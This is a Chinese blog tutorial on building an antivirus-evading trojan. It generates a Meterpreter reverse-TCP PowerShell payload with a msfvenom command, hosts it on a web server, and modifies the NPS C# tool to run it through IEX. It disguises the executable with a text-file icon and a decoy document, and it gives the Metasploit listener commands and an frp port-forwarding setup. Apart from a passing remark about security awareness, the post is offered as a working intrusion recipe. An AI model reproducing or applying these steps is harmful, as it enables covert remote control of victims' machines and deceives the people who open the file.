Nps 执行 powershell 绕过杀软
概述
https://www.jianshu.com/p/2041b89ff572
https://zhuanlan.zhihu.com/p/81344955
可以先参考下小白之前的文章
本次思路大致是这样的:
使用msf生成powershell脚本,并将其放在web服务器上。通过nps 执行 powershell命令(例如:IEX。。。。。。。。)当然已有大佬将源码公https://github.com/Ben0xA/nps。小白这次还是对其源码修改,加入社工的元素。
Frp公网映射
https://www.jianshu.com/p/2041b89ff572
可以参考小白的这篇文章。
Msfveom生成powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f psh-reflection >lly_360_4.ps1
生成的powershell大致是这样的
搭建简易hfs服务器
网上拥有很多搭建方式,当然你也可以使用tomcat,nignx等等。本次试验我用的的hfs,将ps1脚本上传hfs上。
C#修改nps源码
替换一个txt图标。
无黑框运行
写一个创建txt文档的函数。
在木马运行当前路径的上一层,打开一个txt,这样不易被发现。实现的功能是用户双击exe后,弹出一个txt文档。
Msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
小白之前的思路是这样的:目标双击exe,在当前目录下打开一个txt文档,将进程移入其他方,并删除exe自身文件。
但是无奈于能力有限,不会做,那就只能在当前目录的上一层创建并打开txt文档。(希望大佬可以给小白一些建议)。
当然只有洁身自好,才是更好的防护方法。下面这个文章好像让我明白了些什么,哈哈哈。(希望我的能让大家提供安全意识)https://www.zhihu.com/question/322029091/answer/672283363?utm_source=wechat_session&utm_medium=social&utm_oi=949385938997166080&hb_wx_block=1
YLL
2019-9-20
网友评论